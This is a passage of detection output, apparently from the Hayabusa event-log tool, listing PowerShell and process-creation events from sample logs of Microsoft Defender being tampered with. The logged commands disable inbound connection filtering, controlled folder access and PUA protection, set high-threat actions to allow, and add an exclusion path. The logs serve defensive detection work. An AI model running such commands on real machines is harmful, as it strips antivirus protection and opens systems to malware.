name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:51.134 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:51.151 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:51.155 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:52.339 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:52.355 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableInboundConnectionFiltering $true,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:52.423 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:52.423 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:52.430 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:34:52.432 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx
+2021-10-06 18:46:09.533 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -command ""Set-MpPreference -EnableControlledFolderAccess Disabled"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x242c | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx
+2021-10-06 18:46:13.168 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -command ""Set-MpPreference -PUAProtection disable"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x21f4 | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx
+2021-10-06 18:46:28.683 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1bcc | User: WIN10-02$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx
+2021-10-06 19:08:33.314 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx
+2021-10-06 19:08:33.362 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -HighThreatDefaultAction 6 -Force,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx
+2021-10-06 19:08:33.671 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""HighThreatDefaultAction""; value=""Allow"" ParameterBinding(Set-MpPreference): name=""Force""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx
+2021-10-06 19:08:33.672 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx
+2021-10-06 19:08:33.680 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx
+2021-10-06 19:08:33.683 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx
+2021-10-06 20:14:56.275 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx
+2021-10-06 20:14:56.300 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -ExclusionPath c:\document\virus\,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx
+2021-10-06 20:14:56.424 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""ExclusionPath""; value=""c:\document\virus\"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; 